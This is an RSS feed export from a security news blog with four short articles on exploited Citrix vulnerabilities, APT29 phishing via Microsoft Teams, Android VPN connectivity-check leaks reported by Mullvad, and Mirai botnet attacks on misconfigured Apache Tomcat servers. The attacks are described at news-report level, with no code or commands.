Calenderweek 31 – WafdogBlog http://192.168.11.11 Fri, 22 Mar 2024 12:12:48 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 http://192.168.11.11/wp-content/uploads/2023/11/logo_fav.png Calenderweek 31 – WafdogBlog http://192.168.11.11 32 32 Critical Citrix Vulnerabilities Lead to Widespread Cybersecurity Breaches http://192.168.11.11/critical-citrix-vulnerabilities-lead-to-widespread-cybersecurity-breaches/ Wed, 15 Nov 2023 12:00:09 +0000 http://192.168.11.11/?p=1021 Critical Citrix Vulnerabilities Lead to Widespread Cybersecurity Breaches Read More »

]]>

Multiple Citrix NetScaler ADC and Gateway servers have been compromised by attackers using a critical code injection vulnerability identified as CVE-2023-3519, reports the Shadowserver Foundation. This vulnerability, which Citrix addressed in a recent update, has a high severity rating of 9.8. The attacks mainly target servers in Germany, France, Switzerland, Italy, Sweden, Spain, Japan, China, Austria, and Brazil, deploying web shells for unauthorized access.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) had previously disclosed an attack using this vulnerability against a critical infrastructure entity in June 2023.

Additionally, GreyNoise observed attempts to exploit another significant Citrix vulnerability, CVE-2023-24489, in the Citrix ShareFile system. This flaw, rated 9.1, allows unauthenticated file uploads and remote code execution, and has been fixed in ShareFile version 5.11.24 onwards.

Assetnote, a company specializing in attack surface management, identified this vulnerability, linking it to a simpler form of a padding oracle attack. Security expert Dylan Pindur highlighted the importance of understanding the behavior of AES encryption in .NET, particularly with Cipher Block Chaining mode and PKCS#7 padding, to identify potential padding oracle attacks.

The Shadowserver Foundation further updated that nearly 7,000 unpatched NetScaler ADC and Gateway instances remain online, with CVE-2023-3519 being actively exploited to install PHP web shells for remote access.

]]>
Russian Hackers Target Global Organizations Through Microsoft Teams http://192.168.11.11/russian-hackers-target-global-organizations-through-microsoft-teams/ Wed, 15 Nov 2023 11:35:48 +0000 http://192.168.11.11/?p=1018 Russian Hackers Target Global Organizations Through Microsoft Teams Read More »

]]>
Since May 2023, a Russian hacker group known as APT29, Midnight Blizzard, UNC2452, or Cozy Bear, allegedly linked to Russia’s Foreign Intelligence Service (SVR), has been targeting international organizations, including government agencies, NGOs, IT service providers, technology, and media companies, using Microsoft Teams. Microsoft disclosed that the attacks involved social engineering tactics, primarily phishing campaigns aiming to steal credentials and multi-factor authentication (MFA) codes through fraudulent Microsoft Teams chats.

The hackers initially gained access by stealing tokens or using other attack techniques to obtain Microsoft 365 tenant credentials. They then sent fake support messages from these compromised accounts to trick recipients into revealing their credentials and MFA codes. A notable strategy included creating new domains under the legitimate Microsoft domain “onmicrosoft.com” to appear trustworthy, facilitating credential theft. Microsoft has notified affected customers and taken steps to prevent further misuse of the exploited domains.

Furthermore, security researchers from Jumpsec reported in June that they bypassed client-side security controls of Microsoft Teams to plant malware in other organizations’ mailboxes. While Microsoft did not see immediate remediation as necessary in this instance, the recent attacks underscore the significance of such vulnerabilities.

The campaign, active since late May 2023, impacted less than 40 organizations globally across various sectors. Midnight Blizzard used token theft, spear-phishing, password spraying, and brute-force attacks for initial access, then exploited on-premises environments to move laterally to the cloud, similar to the SolarWinds hack in 2020. In some attacks, the actor attempted to add devices as managed via Microsoft Entra ID to bypass conditional access policies.

The attacks also involved creating new onmicrosoft.com subdomains and users in previously compromised tenants to start Teams chats, masquerading as technical support or Microsoft’s Identity Protection team, to lure victims. Once the target accepted the chat, they were persuaded to enter a code into their Microsoft Authenticator app, granting the actor a token for account takeover and subsequent activities.

These incidents are part of a broader pattern, including phishing attacks against diplomatic entities in Eastern Europe delivering a new backdoor called GraphicalProton and exploiting Azure AD Connect to create undetectable backdoors and intercept credentials.

]]>
Mullvad’s Alert: Uncovering VPN Privacy Leaks in Android Devices http://192.168.11.11/mullvads-alert-uncovering-vpn-privacy-leaks-in-android-devices/ Wed, 15 Nov 2023 11:28:26 +0000 http://192.168.11.11/?p=1015 Mullvad’s Alert: Uncovering VPN Privacy Leaks in Android Devices Read More »

]]>
Mullvad, a VPN provider, has identified a privacy concern for Android users: devices may inadvertently leak information when connected to VPNs. This issue arises because Android performs connectivity checks outside the VPN tunnel, even with the “Block connections without VPN” security feature enabled. These checks, designed for functions like authenticating on captive portals, occur independently of the VPN connection.

The concern centers on the potential exposure of user data, including source IP addresses, to those controlling connectivity check servers or monitoring network traffic. Such data could be exploited by sophisticated entities for further analysis. Mullvad stresses that while most Android users might not object to these checks, the privacy implications are significant for those relying on VPNs for complete security.

Android lacks user-facing options to disable this external traffic, prompting Mullvad to publish a technical guide on how to manually disable these connectivity checks. However, Google has responded to this issue by classifying it as intended behavior, arguing that the data revealed is minimal and the option to disable such traffic might confuse most users. They also point out that some VPNs may utilize this connectivity information.

Mullvad counters by emphasizing the importance of offering users the choice to prevent any potential data leaks. For Android users seeking absolute leak protection, the only current solution is to follow Mullvad’s guide to modify device settings and block these external connections.

]]>
Securing the Digital Horizon: Protecting Apache Tomcat Servers from Emerging Cyber Threats http://192.168.11.11/securing-the-digital-horizon-protecting-apache-tomcat-servers-from-emerging-cyber-threats/ Wed, 15 Nov 2023 11:22:45 +0000 http://192.168.11.11/?p=1012 Securing the Digital Horizon: Protecting Apache Tomcat Servers from Emerging Cyber Threats Read More »

]]>
Apache Tomcat, a widely used open-source server, provides support for Jakarta Servlet, Expression Language, and WebSocket technologies in a Java-based HTTP web server environment. It’s particularly popular among developers, with about 50% adoption rate, and plays a significant role in cloud services, big data, and web development.

However, a new threat has been identified by Aqua’s cybersecurity researchers: attackers are exploiting misconfigured Apache Tomcat servers to distribute Mirai botnet malware and cryptocurrency miners. Over two years, Aqua’s honeypots detected over 800 attacks on Tomcat servers, with 96% linked to the Mirai botnet.

The typical attack involves using the “neww” web shell script, originating from 24 different IP addresses. A brute force attack is launched against Tomcat servers to gain access to the web application manager using various credential combinations. Once inside, attackers deploy a WAR file containing ‘cmd.jsp’ web shell, allowing them to execute commands remotely and compromise the server.

The attack chain includes downloading and executing the “neww” script, which is later removed using the “rm -rf” command. This script downloads 12 binary files tailored to the system’s architecture. The WAR file, crucial for web applications, contains HTML, CSS, Servlets, and Classes, facilitating the deployment of the web app on compromised servers.

The final stage of the malware is a Mirai botnet variant, which uses infected hosts for DDoS attacks. The attackers infiltrate the web app manager with valid credentials, upload a disguised web shell in the WAR file, and execute commands remotely to initiate the attack.

With cryptocurrency mining’s growth (a 399% increase in attacks in the first half of 2023), the findings highlight the growing threat. To mitigate these attacks, cybersecurity analysts recommend proper configuration of environments, regular scans for threats, empowering teams with cloud-native vulnerability scanning tools, and using runtime detection and response solutions.

]]>